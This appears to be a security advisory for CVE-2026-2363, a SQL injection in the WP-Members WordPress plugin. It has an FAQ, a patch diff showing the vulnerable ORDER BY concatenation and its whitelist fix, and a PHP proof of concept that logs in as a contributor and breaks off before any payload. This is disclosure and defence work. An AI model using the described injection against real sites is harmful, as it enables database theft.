What is CVE-2026-2363?

CVE-2026-2363 is a SQL Injection vulnerability found in the WP-Members Membership Plugin for WordPress. It affects versions up to and including 3.5.5.1, allowing authenticated users with Contributor-level access or higher to manipulate SQL queries through the ‘order_by’ shortcode attribute.

How does the SQL Injection vulnerability work?

The vulnerability arises from insufficient input validation and lack of prepared statements in the handling of the ‘order_by’ parameter. Attackers can inject malicious SQL code, potentially allowing them to extract sensitive information from the database.

Who is affected by this vulnerability?

Any WordPress site using the WP-Members Membership Plugin version 3.5.5.1 or earlier is vulnerable. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin dashboard and look for the WP-Members Membership Plugin. Verify that the version is 3.5.5.1 or earlier.

How can I fix or mitigate this vulnerability?

The vulnerability can be fixed by updating the WP-Members Membership Plugin to version 3.5.6 or later, where the issue has been patched. It is also advisable to regularly update all plugins to their latest versions.

What does the CVSS score of 6.5 indicate?

The CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure if exploited.

What is the significance of the CWE-89 classification?

CWE-89 refers to SQL Injection vulnerabilities, which occur when an application allows untrusted data to be included in SQL queries without proper validation. This classification highlights the nature of the security issue.

What does the proof of concept demonstrate?

The proof of concept provided illustrates how an authenticated attacker can exploit the vulnerability by injecting SQL commands through the ‘order_by’ parameter. It shows the steps to authenticate and execute a malicious payload.

What are the potential consequences of exploitation?

If exploited, this vulnerability could allow attackers to access sensitive data stored in the WordPress database, including user credentials and plugin configurations, potentially compromising the entire site.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing web application firewalls, regular security audits, and user access controls to minimize the risk of exploitation.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the WP-Members Membership Plugin until a secure version can be installed. Additionally, review user permissions to limit access to only necessary users.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2363: WP-Members Membership Plugin <= 3.5.5.1 – Authenticated (Contributor+) SQL Injection via 'order_by' Shortcode Attribute (wp-members)

CVE ID CVE-2026-2363

Plugin wp-members

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 3.5.5.1

Patched Version 3.5.6

Disclosed March 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2363:
The vulnerability is a SQL injection in the WP-Members Membership Plugin’s `get_all_posts` method. The root cause is insufficient input validation and lack of prepared statements for the `order_by` parameter in the `[wpmem_user_membership_posts]` shortcode handler. The vulnerable function `get_all_posts()` in `/wp-members/includes/class-wp-members-products.php` directly concatenates user-controlled `order_by` and `order` parameters into an SQL query without proper sanitization. Attackers with Contributor-level access can exploit this by injecting malicious SQL payloads via the shortcode’s `order_by` attribute. The patch implements a whitelist validation for both `order_by` and `order` parameters, restricting allowed values to specific safe options. It also replaces string concatenation with a prepared statement using `$wpdb->prepare()`. This prevents SQL injection by ensuring only predefined column names and sort directions are used in the ORDER BY clause. Successful exploitation allows authenticated attackers to extract sensitive data from the WordPress database, including user credentials and plugin configuration.

Differential between vulnerable and patched code

Code Diff

--- a/wp-members/includes/admin/admin.php
+++ b/wp-members/includes/admin/admin.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  *
  * Functions included:
  * - wpmem_admin
--- a/wp-members/includes/admin/api.php
+++ b/wp-members/includes/admin/api.php
@@ -4,12 +4,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  *
  * Functions included:
  * - wpmem_add_custom_email
--- a/wp-members/includes/admin/dialogs.php
+++ b/wp-members/includes/admin/dialogs.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-about.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-about.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-captcha.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-captcha.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-dialogs.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-dialogs.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-dropins.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-dropins.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-emails.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-emails.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-fields.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-fields.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-filesystem-upgrade.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-filesystem-upgrade.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-options.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-options.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-admin-tab-shortcodes.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-admin-tab-shortcodes.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-dropins-table.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-dropins-table.php
@@ -4,12 +4,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/admin/tabs/class-wp-members-fields-table.php
+++ b/wp-members/includes/admin/tabs/class-wp-members-fields-table.php
@@ -4,12 +4,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/api/api-email.php
+++ b/wp-members/includes/api/api-email.php
@@ -4,13 +4,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @subpackage WP-Members API Functions
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 /**
--- a/wp-members/includes/api/api-forms.php
+++ b/wp-members/includes/api/api-forms.php
@@ -4,13 +4,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package    WP-Members
  * @subpackage WP-Members API Functions
  * @author     Chad Butler
- * @copyright  2006-2025
+ * @copyright  2006-2026
  */

 /**
--- a/wp-members/includes/api/api-products.php
+++ b/wp-members/includes/api/api-products.php
@@ -4,13 +4,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @subpackage WP-Members API Functions
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 /**
--- a/wp-members/includes/api/api-users.php
+++ b/wp-members/includes/api/api-users.php
@@ -4,13 +4,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @subpackage WP-Members API Functions
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 /**
--- a/wp-members/includes/api/api-utilities.php
+++ b/wp-members/includes/api/api-utilities.php
@@ -7,13 +7,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @subpackage WP-Members Utility Functions
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 if ( ! function_exists( 'wpmem_securify' ) ):
--- a/wp-members/includes/api/api.php
+++ b/wp-members/includes/api/api.php
@@ -4,13 +4,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @subpackage WP-Members API Functions
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/class-wp-members-email.php
+++ b/wp-members/includes/class-wp-members-email.php
@@ -7,13 +7,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @subpackage WP_Members_Shortcodes
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/class-wp-members-filesystem.php
+++ b/wp-members/includes/class-wp-members-filesystem.php
@@ -157,8 +157,16 @@
 		$old_file_path = get_attached_file( $attachment_id );
 		if ( ! file_exists( $old_file_path ) ) {
 			$error = new WP_Error( 'file_missing', 'Original file not found.' );
-			if ( is_wp_error( $error ) ) {
-				// Try if it's http
+			if ( is_wp_error( $error ) ) { // Try if it's https
+				// First, equalize the https and http baseurls.
+				if ( str_contains( $this->baseurl, 'https://' ) ) {
+					// If baseurl is https, change old file path to https for comparison.
+					$old_file_path = str_replace( 'http://', 'https://', $old_file_path );
+				} elseif ( str_contains( $this->baseurl, 'http://' ) ) {
+					// If baseurl is http, change old file path to http for comparison.
+					$old_file_path = str_replace( 'https://', 'http://', $old_file_path );
+				}
+				// Then, try again to see if the file exists.
 				$old_file_path = str_replace( trailingslashit( $this->baseurl ), '', $old_file_path );
 				if ( ! file_exists( $old_file_path ) ) {
 					// Still an error.
--- a/wp-members/includes/class-wp-members-products.php
+++ b/wp-members/includes/class-wp-members-products.php
@@ -478,24 +478,33 @@
 	 * @global  stdClass      $wpdb
 	 *
 	 * @param   string        $product_meta
-	 * @param   string        $order_by id|title|date
+	 * @param   string        $order_by ID|title|date|name|modified
 	 * @param   string        $order asc|desc
 	 * @return  array|boolean $post_ids if not empty, otherwise false
 	 */
-	function get_all_posts( $product_meta, $order_by = 'id', $order = 'ASC' ) {
+	function get_all_posts( $product_meta, $order_by = 'ID', $order = 'ASC' ) {
 		global $wpdb;

 		if ( $order_by ) {
-
-			$order_by = ( $order_by != 'id' ) ? 'post_' . $order_by : 'ID';

-			$sql = 'SELECT m.post_id
-					FROM ' . $wpdb->postmeta . ' m
-					JOIN ' . $wpdb->posts . ' p ON (m.post_id = p.ID AND m.meta_key = "' . esc_sql( $this->post_stem . $product_meta ) . '" )
-					WHERE p.post_status = "publish"
-					ORDER BY ' . $order_by . ' ' . strtoupper( $order ) . ';';
+			// Whitelist allowed $order and $order_by values.
+			$allowed_order    = array( 'ASC', 'DESC' );
+			$allowed_order_by = array( 'ID', 'title', 'date', 'name', 'modified' );
+
+			$order    = in_array( strtoupper( $order ), $allowed_order, true ) ? $order : 'ASC';
+			$order_by = in_array( strtolower( $order_by ), $allowed_order_by, true ) ? $order_by : 'ID';
+
+			// Add post stem to order by value.
+			$order_by = ( $order_by != 'ID' ) ? 'post_' . $order_by : 'ID';

-			$results = $wpdb->get_results( $sql, ARRAY_N );
+			$results = $wpdb->get_results( $wpdb->prepare(
+				'SELECT m.post_id
+				FROM ' . $wpdb->postmeta . ' m
+				JOIN ' . $wpdb->posts . ' p ON (m.post_id = p.ID AND m.meta_key = %s )
+				WHERE p.post_status = "publish"
+				ORDER BY p.' . $order_by . ' ' . $order . ';',
+				$this->post_stem . $product_meta
+			), ARRAY_N );

 		}

--- a/wp-members/includes/class-wp-members-shortcodes.php
+++ b/wp-members/includes/class-wp-members-shortcodes.php
@@ -7,13 +7,13 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @subpackage WP_Members_Shortcodes
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/class-wp-members-user.php
+++ b/wp-members/includes/class-wp-members-user.php
@@ -1080,7 +1080,6 @@

 		// Start checking memberships. If a valid membership is found, quit checking (break).
 		foreach ( $membership_array as $prod ) {
-			$expiration_product = wpmem_is_membership_expirable( $prod );

 			// Does the user have this membership?
 			if ( isset( $memberships[ $prod ] ) ) {
@@ -1089,7 +1088,7 @@
 					// Does user have the required role?
 					if ( wpmem_user_has_role( wpmem_get_membership_role( $prod ) ) ) {
 						// Is it an expiration membership? If not, they're OK at this point.
-						if ( ! $expiration_product ) {
+						if ( ! wpmem_is_membership_expirable( $prod ) ) {
 							$access = true;
 							break;
 						} else {
--- a/wp-members/includes/deprecated.php
+++ b/wp-members/includes/deprecated.php
@@ -8,12 +8,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package   WP-Members
  * @author    Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/install.php
+++ b/wp-members/includes/install.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
@@ -719,7 +719,7 @@
 		global $wpmem;

 		$show_release_notes = true;
-		$release_notes_link = "https://rocketgeek.com/release-announcements/wp-members-3-5-5-1/";
+		$release_notes_link = "https://rocketgeek.com/release-announcements/wp-members-3-5-6/";

 		if ( 'new_install' == $wpmem->install_state ) {
 			$notice_heading = __( 'Thank you for installing WP-Members, the original WordPress membership plugin.', 'wp-members' );
--- a/wp-members/includes/legacy/dialogs.php
+++ b/wp-members/includes/legacy/dialogs.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/includes/vendor/rocketgeek-plugin-manager/class-rocketgeek-deploy-plugin.php
+++ b/wp-members/includes/vendor/rocketgeek-plugin-manager/class-rocketgeek-deploy-plugin.php
@@ -6,10 +6,10 @@
  * @version    1.0.5
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2023-2025 Chad Butler
+ * @copyright  Copyright (c) 2023-2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/includes/vendor/rocketgeek-utilities/includes/arrays.php
+++ b/wp-members/includes/vendor/rocketgeek-utilities/includes/arrays.php
@@ -12,10 +12,10 @@
  * @link       https://github.com/rocketgeek/rocketgeek-utilities/
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2025 Chad Butler
+ * @copyright  Copyright (c) 2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/includes/vendor/rocketgeek-utilities/includes/dates.php
+++ b/wp-members/includes/vendor/rocketgeek-utilities/includes/dates.php
@@ -12,10 +12,10 @@
  * @link       https://github.com/rocketgeek/rocketgeek-utilities/
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2025 Chad Butler
+ * @copyright  Copyright (c) 2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/includes/vendor/rocketgeek-utilities/includes/debug.php
+++ b/wp-members/includes/vendor/rocketgeek-utilities/includes/debug.php
@@ -12,10 +12,10 @@
  * @link       https://github.com/rocketgeek/rocketgeek-utilities/
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2025 Chad Butler
+ * @copyright  Copyright (c) 2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/includes/vendor/rocketgeek-utilities/includes/forms.php
+++ b/wp-members/includes/vendor/rocketgeek-utilities/includes/forms.php
@@ -12,10 +12,10 @@
  * @link       https://github.com/rocketgeek/rocketgeek-utilities/
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2025 Chad Butler
+ * @copyright  Copyright (c) 2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/includes/vendor/rocketgeek-utilities/includes/strings.php
+++ b/wp-members/includes/vendor/rocketgeek-utilities/includes/strings.php
@@ -12,10 +12,10 @@
  * @link       https://github.com/rocketgeek/rocketgeek-utilities/
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2025 Chad Butler
+ * @copyright  Copyright (c) 2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/includes/vendor/rocketgeek-utilities/includes/utilities.php
+++ b/wp-members/includes/vendor/rocketgeek-utilities/includes/utilities.php
@@ -12,10 +12,10 @@
  * @link       https://github.com/rocketgeek/rocketgeek-utilities/
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2025 Chad Butler
+ * @copyright  Copyright (c) 2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/includes/vendor/rocketgeek-utilities/loader.php
+++ b/wp-members/includes/vendor/rocketgeek-utilities/loader.php
@@ -14,10 +14,10 @@
  * @link       https://github.com/rocketgeek/rocketgeek-utilities/
  * @author     Chad Butler <https://butlerblog.com>
  * @author     RocketGeek <https://rocketgeek.com>
- * @copyright  Copyright (c) 2025 Chad Butler
+ * @copyright  Copyright (c) 2026 Chad Butler
  * @license    Apache-2.0
  *
- * Copyright [2025] Chad Butler, RocketGeek
+ * Copyright [2026] Chad Butler, RocketGeek
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
--- a/wp-members/templates/tos.php
+++ b/wp-members/templates/tos.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */
 ?>

--- a/wp-members/uninstall.php
+++ b/wp-members/uninstall.php
@@ -6,12 +6,12 @@
  *
  * This file is part of the WP-Members plugin by Chad Butler
  * You can find out more about this plugin at https://rocketgeek.com
- * Copyright (c) 2006-2025  Chad Butler
+ * Copyright (c) 2006-2026  Chad Butler
  * WP-Members(tm) is a trademark of butlerblog.com
  *
  * @package WP-Members
  * @author Chad Butler
- * @copyright 2006-2025
+ * @copyright 2006-2026
  */

 // Exit if accessed directly.
--- a/wp-members/wp-members.php
+++ b/wp-members/wp-members.php
@@ -3,7 +3,7 @@
 Plugin Name: WP-Members
 Plugin URI:  https://rocketgeek.com
 Description: WP access restriction and user registration.  For more information on plugin features, refer to <a href="https://rocketgeek.com/plugins/wp-members/docs/">the online Users Guide</a>. A <a href="https://rocketgeek.com/plugins/wp-members/quick-start-guide/">Quick Start Guide</a> is also available. WP-Members(tm) is a trademark of butlerblog.com.
-Version:     3.5.5.1
+Version:     3.5.6
 Author:      Chad Butler
 Author URI:  https://butlerblog.com/
 Text Domain: wp-members
@@ -58,7 +58,7 @@
 }

 // Initialize constants.
-define( 'WPMEM_VERSION',    '3.5.5.1' );
+define( 'WPMEM_VERSION',    '3.5.6' );
 define( 'WPMEM_DB_VERSION', '2.4.3' );
 define( 'WPMEM_PATH', plugin_dir_path( __FILE__ ) ); // @todo Fairly certain this is obsolete.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2363 - WP-Members Membership Plugin <= 3.5.5.1 - Authenticated (Contributor+) SQL Injection via 'order_by' Shortcode Attribute

<?php
// Configuration
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Initialize session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$post_fields = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
$response = curl_exec($ch);

// Step 2: Create a post with malicious shortcode
// The shortcode triggers the vulnerable get_all_posts() function
